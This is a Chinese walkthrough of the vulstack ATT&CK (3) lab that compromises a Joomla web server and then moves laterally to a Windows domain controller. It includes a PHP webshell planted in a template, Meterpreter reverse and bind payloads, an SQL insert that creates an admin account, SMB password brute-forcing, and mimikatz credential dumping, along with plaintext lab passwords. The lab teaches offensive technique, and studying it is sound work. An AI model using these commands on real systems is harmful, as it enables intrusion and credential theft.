vulstack ATT&CK(三)靶场
0x00环境搭建
两种形式
1.添加vmare2网卡,修改vmare2网卡的地址为192.168.93.0网段,注意不要在连接到主机适配器上打勾,这样会使本机也可以访问此电脑,5台机器都换成vmare2即可,第一台出网的centos在添加另一张nat网卡即可
centos需要改配置
nginx配置
把/etc/nginx/nginx.conf的server全部改为ubuntu的ip
ps aux|grep nginx
kill -9 进程id
/usr/sbin/nginx -c /etc/nginx/nginx.conf
网络配置
重启服务
service network start
ping www.badiu.com 能ping通说明nat可以正常上网
配置完成:
ubuntu
网络配置
在没有开机之前,选用vmare2网卡
service networking start
其他三台靶机改为vmare2网卡即可
2.修改nat网卡ip为192.168.1.0网段即可
正向代理:vpn,服务器不知道客户端真实地址
反向代理:客户端不知道服务器真实地址
上面web的两台靶机
第一台 centos nginx反向代理,将访问自己的全部流量转发之ubuntu中
第二台 ubuntu web服务器
0x01 web靶机渗透
1.信息搜集(存活ip,端口,服务及版本,cms或框架,中间件,敏感文件或目录)
存活ip,端口,服务及版本
192.168.85.177
22,3306,80
nmap 192.168.85.0/24
nmap -p1-65535 192.168.85.177
nmap -sV 192.168.85.177
访问192.168.85.177网站,寻找漏洞及敏感信息
发现cms joomla,找漏洞时需要版本,所以需要进行版本探测
尝试报错看一下是否会有版本出来
需要再查看一下状态码,看是不是伪造的,状态码为404
找到一个登录框,可以尝试进行暴力破解,sql注入
f12c查看源代码,找到一个search搜索框,尝试sql注入
1’“()\都没报错
先前扫描时服务及版本时时nginx服务器,现在apache服务器,说明做了反向代理
使用msf的auxiliary/scanner/http/joomla_version ,版本是3.9.12
使用msf关于jommla的exp进行攻击时,试了几个,都失败了
现在知道版本了找cms漏洞
CVE-2021-23132 需要登录后台才可以进行执行
或使用工具扫描版本
这里使用joomscan,并且可以进行目录和敏感文件扫描
joomscan -u http://192.168.85.177
找到了robots.txt,还有一个感觉像后台的目录,再就是感觉像配置文件的文件,版本3.9.12
查看配置文件
2.登录数据库
发现了数据库用户名和密码,可以尝试使用navicat进行连接
testuser
cvcvgjASD!@
登录成功
找类似user的关键表
3.修改用户名密码
找到用户名和密码,尝试对密码进行解密,john或cmd5,解密失败
可以下载同样版本的joomla,写一个知道密码的密文,然后进行更新覆盖
知道加密,直接更改,搜索文档可一下有没有进行密码重置的文档
jommla密码重置
直接执行就可以了
INSERT INTO `am2zu_users`
(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)
VALUES ('Administrator2', 'admin2',
'd2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`)
VALUES (LAST_INSERT_ID(),'8');
- password = “this is the MD5 and salted hashed password”
- admin = 433903e0a9d6a712e00251e44d29bf87:UJ0b9J5fufL3FKfCc0TLsYJBh2PFULvT
- secret = d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199
- OU812 = 5e3128b27a2c1f8eb53689f511c4ca9e:J584KAEv9d8VKwRGhb8ve7GdKoG7isMm
4.登录后台
admin2
secret
5.写shell,连接蚁剑
上面找到一个后台远程代码执行漏洞,尝试使用这个漏洞
在extentions-》templates-》templates-》Beez3 Details and Files出可以修改源码
在error.php写入一句话木马
访问http://192.168.85.177/templates/beez3/error.php
post传入1=phpinfo();
执行没问题后连接蚁剑
6.绕过disabled命令执行
发现执行命令时,没有执行,正常来说不管权限多少小,一些基本命令都是能执行的,再次执行phpinfo,查看是不是禁用了函数
发现命令执行的函数都被禁用掉了,这里可以用蚁剑的插件进行绕过
找到插件市场,把下载,如果在蚁剑下载不了,可以直接在github下载对应的插件
放到antSword-master\antData\plugins下,插件名成是as_bypass_php_disable_functions-master
启动插件
选择模块,启动
会重新开启一个执行界面
执行命令
7.继续进行信息搜集
查看网络信息路由
可以看出,是不出网的机器,这台是apache也就是web服务器的真实ip,不是nginx的ip
上传msf木马是不行的,连接不了,代理隧道都不行
两个可以登录的用户,yy和root
注意这里的内核或其他方式提权是不可以的,蚁剑的是一个伪终端,不是真实的bash环境,编译一些文件或执行文件无法返回一个bash会话
发现mysql的plugin目录是可写的,但是提权成功之后也没意义只是能成功执行命令,权限还是www-data,反弹shell,不出网,连不上
系统版本
进入yy的家目录,查看有什么信息,没找到有用的信息,继续进入可读的目录查找敏感信息
tmp目录下发现用户名和密码,但是在passwd文件中并没有发现用户名,所以这个用户名应该是nginx的用户名,信息搜集时返现22端口是开启的,所以可以尝试登陆
8.ssh登录nginx服务器,centos
wwwuser
wwwuser_123Aqx
使用xshell或使用kali自带的ssh
9.继续对centos进行信息搜集
网络
版本
用户
9.上传木马,xshell或wget,执行木马
centos
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.85.129 lport=4444 -f elf -p 1.elf
开启监听
use mutli/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 4444
run
ubuntu
添加路由
run autoroute -s 192.168.93.0/24
或
run post/multi/manage/autoroute
生成木马,通过蚁剑上传执行
msfvenom -p linux/x64/meterpreter/bind_tcp lport=4444 -f elf -p 2.elf
开启监听
use mutli/handler
set payload linux/x64/meterpreter/bind_tcp
set lhost 0.0.0.0
set rhost 192.168.93.120
run
10.提权
centos可以通过脏牛提权,ubuntu可以通过cve-2021-3493,这里不再演示了
0x02 内网横向移动
前面路由已经添加了,这里就不用添加了
1.开启socks代理
use auxiliary/server/socks_proxy
set version 4a
ser srvport 9050
run
2.探测存活主机(在添加路由的那个msfconsole中)
auxiliary/scanner/discover/arp_sweep
auxiliary/scanner/discover/udp_probe
auxiliary/scanner/smb/smb_version
这里使用第二种
use auxiliary/scanner/discover/udp_probe
set rhosts 192.168.93.0/24
run
扫出三台存活主机
192.168.93.10
192.168.93.20
192.168.96.30
3.扫描端口
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.10,20,30
都开放了139,445,尝试永恒之蓝攻击都失败了
192.168.93.20开放了80端口
192.168.93.10开放了88端口
两个访问但是没东西
扫目录也没有扫出来
192.168.93.20 开放了1433,mssql数据库
尝试进行爆破,可以使用前面的mysql密码尝试一下
没试
还有一个思路是爆破smb密码
4.使用hydra爆破smb密码
proxychains4 hydra -l administrator -P pass.txt smb://192.168.93.20
字典要足够多,才能爆破出来
密码 123qwe!ASD
5.连接smb,进行上传木马,mimikatz
生成正向连接木马
msfvenom -p windows/x64/meterpreter/bind_tcp lport=4455 -f exe >1.exe
连接smb,上传木马和mimkatz
proxychains4 smbclient //192.168.93.20/c$ -U administrator
输入密码: 123qwe!ASD
put 1.exe
put mimikatz.exe
6.wmic执行木马上线msf
上线msf还可以用ipc$ 计划任务开实现
wmic执行木马(python impaket wmiexec.py)
proxychains4 impacket-wmiexec 'administrator:123qwe!ASD@192.168.93.20'
开启监听
use multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 192.168.93.20
set lport 4455
run
#提权
getuid
getsystem
getuid
窃取凭据
load mimikatz
creds_all #获取所有凭证
发现域管理员密码,重新上述操作,登录域控
zxcASDqwe123!!
有几个地方需要注意,是test域登录
连接smb,上传木马
proxychains4 smbclient //192.168.93.20/c$ -U test/administrator
输入密码: zxcASDqwe123!!
put 1.exe
proxychains4 impacket-wmiexec 'test/administrator:zxcASDqw123!!@192.168.93.10'
域控成功提权:
参考文章:
vulstack (三)